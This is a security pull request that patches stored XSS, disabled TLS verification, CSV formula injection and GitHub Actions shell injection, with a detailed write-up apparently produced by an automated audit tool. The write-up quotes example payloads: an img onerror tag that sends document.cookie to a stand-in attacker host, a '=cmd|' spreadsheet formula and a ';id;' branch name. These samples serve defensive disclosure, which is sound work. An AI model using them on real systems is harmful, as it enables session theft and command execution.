### PR TITLE
fix(security): bundle — XSS in WidgetMarkdown + TLS-off on Vapi log fetch + CSV formula injection + GHA shell injection

### DIFF
--- a/.github/workflows/branch-name-check.yml
+++ b/.github/workflows/branch-name-check.yml
@@ -9,9 +9,13 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Check branch name
+        env:
+          # Pass the (attacker-influenceable on fork PRs) head_ref via env so
+          # bash never sees the raw value during template expansion. Without
+          # this indirection, a branch named e.g. `";id;"` would inject shell
+          # commands into the runner.
+          BRANCH: ${{ github.head_ref }}
         run: |
-          BRANCH="${{ github.head_ref }}"
-
           # Skip validation for release branches and dependabot
           if [[ "$BRANCH" =~ ^(main|dev|release/.+|dependabot/.+)$ ]]; then
             echo "✅ Skipping validation for $BRANCH"

--- a/frontend/src/components/imagine/widgets/WidgetMarkdown.jsx
+++ b/frontend/src/components/imagine/widgets/WidgetMarkdown.jsx
@@ -3,6 +3,19 @@ import PropTypes from "prop-types";
 import { Box } from "@mui/material";
 import { useTheme } from "@mui/material/styles";
 
+// Escape HTML so that user-/LLM-supplied content cannot inject raw markup
+// (script tags, event handlers, javascript: hrefs) when rendered via
+// dangerouslySetInnerHTML below. Markdown substitutions re-introduce a small
+// allow-list of tags AFTER escaping.
+function escapeHtml(s) {
+  return String(s)
+    .replace(/&/g, "&amp;")
+    .replace(/</g, "&lt;")
+    .replace(/>/g, "&gt;")
+    .replace(/"/g, "&quot;")
+    .replace(/'/g, "&#39;");
+}
+
 export default function WidgetMarkdown({ config }) {
   const theme = useTheme();
   const isDark = theme.palette.mode === "dark";
@@ -11,7 +24,7 @@ export default function WidgetMarkdown({ config }) {
   const codeBg = isDark ? "#2d2d2d" : "#f5f5f5";
   const inlineBg = isDark ? "#3a3a3a" : "#f0f0f0";
 
-  const html = content
+  const html = escapeHtml(content)
     .replace(
       /```(\w*)\n([\s\S]*?)```/g,
       `<pre style="background:${codeBg};padding:8px;border-radius:4px;overflow-x:auto;font-size:12px;"><code>$2</code></pre>`,

--- a/futureagi/model_hub/views/performance.py
+++ b/futureagi/model_hub/views/performance.py
@@ -2,6 +2,20 @@ import csv
 import traceback
 
 import structlog
+
+
+def _escape_csv_cell(value):
+    """Defang CSV-formula injection: prefix a leading formula trigger with a
+    single quote so spreadsheet apps (Excel/Sheets/LibreOffice) treat the cell
+    as a literal string rather than evaluating it as a formula. Triggers per
+    OWASP CSV-injection guidance: =, +, -, @, tab, carriage return.
+    """
+    if value is None:
+        return ""
+    s = str(value)
+    if s and s[0] in ("=", "+", "-", "@", "\t", "\r"):
+        return "'" + s
+    return s
 from django.db.models import Case, Prefetch, When
 from django.http import HttpResponse
 from rest_framework import status
@@ -401,12 +415,12 @@ class PerformanceDetailsExport(APIView):
                 each_performance = performance[idx]
                 writer.writerow(
                     [
-                        node_message_input[idx].message.content,
-                        node_message_output[idx].message.content,
-                        each_performance[2],
-                        each_performance[3],
-                        each_performance[6],
-                        each_performance[1],
+                        _escape_csv_cell(node_message_input[idx].message.content),
+                        _escape_csv_cell(node_message_output[idx].message.content),
+                        _escape_csv_cell(each_performance[2]),
+                        _escape_csv_cell(each_performance[3]),
+                        _escape_csv_cell(each_performance[6]),
+                        _escape_csv_cell(each_performance[1]),
                     ]
                 )
 

--- a/futureagi/tracer/utils/vapi.py
+++ b/futureagi/tracer/utils/vapi.py
@@ -361,7 +361,7 @@ def _extract_call_logs(log: dict, eval_attributes: dict):
         return
 
     try:
-        response = requests.get(log_url, timeout=60, verify=False, stream=True)
+        response = requests.get(log_url, timeout=60, stream=True)
         response.raise_for_status()
 
         entries = []


### PR DESCRIPTION
## Disclosure path

Filing publicly after the private channels were unworkable: PVR is disabled at the repo level, and the email path to `security@futureagi.com` was queued on our side with no SMTP-out from the agent. Coordinated with operator before going public. Happy to fold this into a private flow the moment one is available.

This bundles four related findings I'd normally split into separate PRs — bundling because they were found in the same audit and the patch is a single 4-file commit (`df9c4ef`, +41/-10). Pick them apart on merge if you prefer.

---

## Finding 1 — Stored XSS in WidgetMarkdown (Medium, CWE-79)

**Location:** `frontend/src/components/imagine/widgets/WidgetMarkdown.jsx:14`

The Imagine dashboard's markdown widget renders LLM-generated analysis output via `dangerouslySetInnerHTML` without escaping. Data flow:

```
trace data (attacker-influenceable for any traced LLM app)
  → /tracer/imagine-analysis/poll → response.data.result.analyses[].content
  → useImagineStore.setAnalysis(traceId, widgetId, content)
  → resolveBindings → widget.config.content
  → WidgetMarkdown → dangerouslySetInnerHTML
```

A trace input/output that contains `<img src=x onerror=fetch('https://attacker/?c='+document.cookie)>` will produce LLM output that may echo or paraphrase the payload. When a teammate opens the trace in the Imagine tab and the dynamic-analysis widget runs, the script executes in their authenticated session — session/token exfiltration scoped to whatever the cookies expose.

The regex markdown substitutions intentionally inject a small set of HTML tags (`<pre>`, `<code>`, `<h2..h4>`, `<strong>`, etc.), so the fix escapes the input *before* the regex pass and lets the substitutions re-introduce only the allow-listed tags.

---

## Finding 2 — Disabled TLS verification on Vapi log fetch (Medium, CWE-295)

**Location:** `futureagi/tracer/utils/vapi.py:364`

```python
response = requests.get(log_url, timeout=60, verify=False, stream=True)
```

`log_url` is the `artifact.logUrl` from a Vapi.ai call-log payload — the response is gunzipped and stored as `call_logs` on the trace span. Disabling cert validation lets a network adversary on the path between the Future AGI tracer and Vapi's CDN MITM the connection and inject arbitrary log lines into traces. Those lines later render in trace UI views and feed the Imagine widget pipeline above (so this and Finding 1 chain).

**Fix.** Drop `verify=False`. Patch removes only that kwarg.

---

## Finding 3 — CSV formula injection in performance export (Medium, CWE-1236)

**Location:** `futureagi/model_hub/views/performance.py:402`

`writer.writerow([node_message_input[idx].message.content, node_message_output[idx].message.content, ...])` — the row contains LLM input/output captured from traces. Cells starting with `=`, `+`, `-`, `@`, tab, or CR are evaluated as formulas when the CSV is opened in Excel / Google Sheets / LibreOffice. A logged user-supplied input like `=cmd|'/c calc'!A1` becomes a working RCE on the analyst's workstation when they open the export.

**Fix.** Patch adds `_escape_csv_cell()` (prefix triggering chars with `'`) and applies it to all cells in this writer.

**Other writers worth auditing for the same pattern (not patched in this branch):**

- `futureagi/model_hub/views/annotation_queues.py:524` — annotation values (free-text), notes, source-type
- `futureagi/agentcc/services/export.py:33` — agentcc log export
- `futureagi/simulate/views/run_test.py:5240` — simulation row data
- `futureagi/agentic_eval/core/embeddings/embedding_manager.py:80` — embedding log entries
- `futureagi/tracer/views/trace.py:4703` — trace row export

Can extend the patch to cover those — left out because some of those rows are structured IDs/scores that don't carry user content, and over-escaping numeric cells can break downstream parsing.

---

## Finding 4 — GitHub Actions shell injection via `head_ref` (Low/Medium, CWE-78)

**Location:** `.github/workflows/branch-name-check.yml:13`

```yaml
run: |
  BRANCH="${{ github.head_ref }}"
```

The workflow runs on `pull_request`, so `head_ref` is supplied by the PR author and Git ref names allow characters that break out of the shell context. A fork PR with a branch named like `";id;"` would execute `id` on the runner.

**Impact is bounded** because the trigger is `pull_request` (not `pull_request_target`), so secrets are not exposed and `GITHUB_TOKEN` is read-only. The realistic attacker outcomes are: runner-compute abuse, exfiltration of PR contents/cache, and whatever supply-chain leverage cache poisoning gives in the future. Calling it Low/Medium.

**Fix.** Patch passes `head_ref` via an `env:` block instead of template-expanding it directly into the bash heredoc, which is the standard GHA hardening pattern.

I also checked `.github/workflows/frontend-feature.yml` — its line 16 has the same template-interpolation shape but the `on:` is `push:` (not pull_request), so it would require write access on the base repo to exploit (self-pwn). The `actions/github-script` step at line 83 has the gated `if: github.event_name == 'pull_request'` but the workflow only triggers on `push`, so that step is unreachable. Both are worth tightening defensively but neither is independently exploitable; left them out of the patch.

---

## Verification

- `WidgetMarkdown.jsx` — visual regression risk only; the markdown subset still renders identically with the patch (escape happens before the substitutions).
- `vapi.py` — drop-in change; behavior is identical when the cert chain is valid (the `verify=False` was the only outlier).
- `performance.py` — pure cell-level transformation; numeric cells are unaffected because `'1.5'[0] == '1'` is not in the trigger set.
- `branch-name-check.yml` — env-based interpolation is a documented GHA hardening pattern.

No project-wide test target on the frontend that I could exercise without your build secrets. CI on this PR is the authoritative check.

---

## Dependency-CVE backlog (separate from this PR)

`osv-scanner` against your lockfiles flagged 644 vulnerable-package matches across `frontend/yarn.lock`, `frontend/package-lock.json`, `futureagi/uv.lock`, `futureagi/requirements.txt`, `futureagi/requirements-test.txt`, `futureagi/agentic_eval/requirements-test.txt`. 13 unique CRITICAL. Highest-leverage production bumps: **`langchain-core` → ≥0.3.83** (GHSA-c67j-w6g6-q2cm serialization secret extraction), **`litellm` ≥ 1.82.x** (GHSA-jjhc-v7c2-5hh6 OIDC cache-key auth bypass), **`authlib` ≥ 1.7** (GHSA-wvwj-cvrp-7pv5 JWS header injection), **`nltk` ≥ 3.9.3** (GHSA-7p94-766c-hgjp Zip Slip), plus **`pyjwt` ≥ 2.11**, **`urllib3` ≥ 2.6**, **`tornado` ≥ 6.6**, **`django` ≥ 5.1.13**, **`pillow` ≥ 12.2**, and **axios ≥ 1.16.0** / **tar ≥ 6.2.2** on the npm side.

I deliberately left the lockfile bumps off the patch branch — 50+ package bumps touch transitive resolution and your dependency tooling (Dependabot/Renovate) will sequence them better than a single drive-by. Happy to send a separate patch series if your tooling isn't running.

## Detected by

[Aeon](https://github.com/aaronjmars/aeon-aaron) — `semgrep 1.162.0` + `osv-scanner 2.3.8` + `trufflehog 3.95.2` + manual review. I review and triage every finding before sending.